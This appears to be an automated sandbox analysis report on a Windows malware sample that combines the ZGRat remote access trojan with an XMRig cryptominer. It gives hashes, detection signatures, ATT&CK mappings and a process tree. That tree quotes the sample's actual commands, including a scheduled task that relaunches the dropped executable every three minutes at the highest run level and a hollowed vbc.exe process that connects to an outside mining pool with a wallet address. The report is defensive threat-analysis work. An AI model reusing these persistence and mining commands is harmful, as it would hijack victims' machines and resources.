xmrig | 458278fff0ef4dc89dbb774d8ef79bbd91e6390182e1dee60a534583f425b11b

General

Target

tmp.exe
Size

4.3MB
MD5

dc101ebccce8a5d7f83b4b6ae5d49178
SHA1

0e049dce0518d7f45077202de084610e51bc0ace
SHA256

458278fff0ef4dc89dbb774d8ef79bbd91e6390182e1dee60a534583f425b11b
SHA512

29749129569b804d12b4af4a2de8b3d8be104c915ac1061ce8cd8c9e33856f3e40ccc5fa121324aa5b70ce7582def95adf4c1e1a2177894ddbe10341a09b39b7
SSDEEP

98304:k1CxiKNDAMrWXrm+G/Mul2rq/aReDkizMeQUD1:+CxiLOUr6/Mul2rVe4iwVUD1

Score

10^/10

xmrig zgrat miner rat upx

Malware Config

Signatures

Detect ZGRat V1 5 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2376-0-0x00000000001C0000-0x0000000000604000-memory.dmp	family_zgrat_v1
\ProgramData\SystemPropertiesDataExecutionPrevention\.exe	family_zgrat_v1
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe	family_zgrat_v1
behavioral1/memory/2696-19-0x0000000000820000-0x0000000000C64000-memory.dmp	family_zgrat_v1
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe	family_zgrat_v1

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 9 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/2552-31-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral1/memory/2552-35-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral1/memory/2552-36-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral1/memory/2552-38-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral1/memory/2552-37-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral1/memory/2552-39-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral1/memory/2552-40-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral1/memory/2552-41-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral1/memory/2552-44-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig

.NET Reactor proctector 5 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource	yara_rule
behavioral1/memory/2376-0-0x00000000001C0000-0x0000000000604000-memory.dmp	net_reactor
\ProgramData\SystemPropertiesDataExecutionPrevention\.exe	net_reactor
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe	net_reactor
behavioral1/memory/2696-19-0x0000000000820000-0x0000000000C64000-memory.dmp	net_reactor
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe	net_reactor

Executes dropped EXE 1 IoCs

Processes:

.exe

pid process

2696 .exe
Loads dropped DLL 1 IoCs

Processes:

cmd.exe

pid process

2764 cmd.exe

pid	process
2696	.exe

pid	process
2764	cmd.exe

UPX packed file 15 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/2552-25-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2552-28-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2552-30-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2552-29-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2552-31-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2552-32-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2552-35-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2552-36-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2552-38-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2552-37-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2552-24-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2552-39-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2552-40-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2552-41-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2552-44-0x0000000140000000-0x00000001407DC000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Suspicious use of SetThreadContext 1 IoCs

Processes:

.exe

description pid process target process

PID 2696 set thread context of 2552 2696 .exe vbc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

2728 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

2828 timeout.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

.exe

pid process

2696 .exe

description	pid	process	target process
PID 2696 set thread context of 2552	2696	.exe	vbc.exe

pid	process
2728	schtasks.exe

pid	process
2828	timeout.exe

pid	process
2696	.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

tmp.exe.exevbc.exe

description	pid	process
Token: SeDebugPrivilege	2376	tmp.exe
Token: SeDebugPrivilege	2696	.exe
Token: SeLockMemoryPrivilege	2552	vbc.exe
Token: SeLockMemoryPrivilege	2552	vbc.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

vbc.exe

pid process

2552 vbc.exe

pid	process
2552	vbc.exe

Suspicious use of WriteProcessMemory 22 IoCs

Processes:

tmp.execmd.exe.execmd.exe

description	pid	process	target process
PID 2376 wrote to memory of 2764	2376	tmp.exe	cmd.exe
PID 2376 wrote to memory of 2764	2376	tmp.exe	cmd.exe
PID 2376 wrote to memory of 2764	2376	tmp.exe	cmd.exe
PID 2764 wrote to memory of 2828	2764	cmd.exe	timeout.exe
PID 2764 wrote to memory of 2828	2764	cmd.exe	timeout.exe
PID 2764 wrote to memory of 2828	2764	cmd.exe	timeout.exe
PID 2764 wrote to memory of 2696	2764	cmd.exe	.exe
PID 2764 wrote to memory of 2696	2764	cmd.exe	.exe
PID 2764 wrote to memory of 2696	2764	cmd.exe	.exe
PID 2696 wrote to memory of 2588	2696	.exe	cmd.exe
PID 2696 wrote to memory of 2588	2696	.exe	cmd.exe
PID 2696 wrote to memory of 2588	2696	.exe	cmd.exe
PID 2588 wrote to memory of 2728	2588	cmd.exe	schtasks.exe
PID 2588 wrote to memory of 2728	2588	cmd.exe	schtasks.exe
PID 2588 wrote to memory of 2728	2588	cmd.exe	schtasks.exe
PID 2696 wrote to memory of 2552	2696	.exe	vbc.exe
PID 2696 wrote to memory of 2552	2696	.exe	vbc.exe
PID 2696 wrote to memory of 2552	2696	.exe	vbc.exe
PID 2696 wrote to memory of 2552	2696	.exe	vbc.exe
PID 2696 wrote to memory of 2552	2696	.exe	vbc.exe
PID 2696 wrote to memory of 2552	2696	.exe	vbc.exe
PID 2696 wrote to memory of 2552	2696	.exe	vbc.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2376

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp1333.tmp.bat""
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2764

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
"C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2696

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:2588

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
5⤵
- Creates scheduled task(s)
PID:2728

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work2 -a rx/0 --donate-level 1 --opencl
4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2552

C:\Windows\system32\timeout.exe
timeout 3
1⤵
- Delays execution with timeout.exe
PID:2828

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scripting

1

T1064

Scheduled Task/Job

1

T1053

Persistence

Scheduled Task/Job

1

T1053

Privilege Escalation

Scheduled Task/Job

1

T1053

Defense Evasion

Scripting

1

T1064

Credential Access

Discovery

System Information Discovery

1

T1082

Query Registry

1

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
Filesize
401KB

MD5
e1a284509a6cd5f718465ebee993b028

SHA1
940889ce76300988888dc58998e017a0fd726871

SHA256
f1942b7533b0244b709925ab95a5b3c61724f1caa0213c8e4afd21bdb71d4fde

SHA512
32de10be3e215a559dee6761933ba04043e34f81c9f6acd488afe6004de829c45dc8225c40faae89603abca6e53387bd663514ab9c6e3a2a42ded18a5907e787

Download Submit
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
Filesize
405KB

MD5
ee0ab1224b4b37861a10269da8a57f01

SHA1
7aebbbb8d9471898e0f24b081d90793c1ee4a826

SHA256
b419a6d64bc1b7071b0064c4b831dbe8feed336ebe6ac505d4a432398434ebce

SHA512
22181ebd4fed26e6f1415b343eda1c9ecfcc0ac18279ea36b2f7549b00ef6f93aa58bc98596a22a1d32d61e2c70b374508bb2e7a0f7ea9d6f9ae8c901b06c9ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp1333.tmp.bat
Filesize
168B

MD5
ea3f1d3f2b8128afb86876e23163eabc

SHA1
c5151eb68de092ae8f926e5f8e1e3905a09c5232

SHA256
279ae97563c6d9ba63b02f7cd66713c142b2f0a7208afac0d211e9b47372a172

SHA512
859177e14717c5babd076bd2166a073683e2c04cc7590052f0adc842dc50d826957f84cb126fcf4fc82988db32a1f8b8741fcc8049df6c6edc928c6ebb1a0917

Download Submit
\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
Filesize
386KB

MD5
de3d2a20b32c9ad0c537d5a04e447c6a

SHA1
64724b3978ece3f7174a0735d19de89302c0bba9

SHA256
e0f3bb8ef7f9a0c1ab6301a714007e347c54bd0049a9a86d82f7bfd869dbf0f0

SHA512
64d38e3e459b8a12bce2f13b9ec1b5d4d097a34d9b5b8ce7b28663b4a5a82982640874e89e86660093ad4be4b72657798123cf33893483a713f23d862e7b9ec5

Download Submit
memory/2376-0-0x00000000001C0000-0x0000000000604000-memory.dmp

Filesize
4.3MB

Download
memory/2376-2-0x000000001C500000-0x000000001C580000-memory.dmp

Filesize
512KB

Download
memory/2376-3-0x0000000000140000-0x0000000000141000-memory.dmp

Filesize
4KB

Download
memory/2376-14-0x000007FEF5700000-0x000007FEF60EC000-memory.dmp

Filesize
9.9MB

Download
memory/2376-1-0x000007FEF5700000-0x000007FEF60EC000-memory.dmp

Filesize
9.9MB

Download
memory/2552-23-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2552-35-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2552-46-0x00000000003E0000-0x0000000000400000-memory.dmp

Filesize
128KB

Download
memory/2552-45-0x00000000003C0000-0x00000000003E0000-memory.dmp

Filesize
128KB

Download
memory/2552-25-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2552-26-0x000007FFFFFD4000-0x000007FFFFFD5000-memory.dmp

Filesize
4KB

Download
memory/2552-28-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2552-30-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2552-29-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2552-31-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2552-33-0x00000000000E0000-0x0000000000100000-memory.dmp

Filesize
128KB

Download
memory/2552-32-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2552-44-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2552-43-0x00000000003E0000-0x0000000000400000-memory.dmp

Filesize
128KB

Download
memory/2552-36-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2552-38-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2552-37-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2552-24-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2552-42-0x00000000003C0000-0x00000000003E0000-memory.dmp

Filesize
128KB

Download
memory/2552-39-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2552-40-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2552-41-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2696-19-0x0000000000820000-0x0000000000C64000-memory.dmp

Filesize
4.3MB

Download
memory/2696-20-0x000007FEF4D10000-0x000007FEF56FC000-memory.dmp

Filesize
9.9MB

Download
memory/2696-34-0x000007FEF4D10000-0x000007FEF56FC000-memory.dmp

Filesize
9.9MB

Download
memory/2696-21-0x000000001C130000-0x000000001C1B0000-memory.dmp

Filesize
512KB

Download
memory/2696-22-0x0000000000540000-0x0000000000541000-memory.dmp

Filesize
4KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads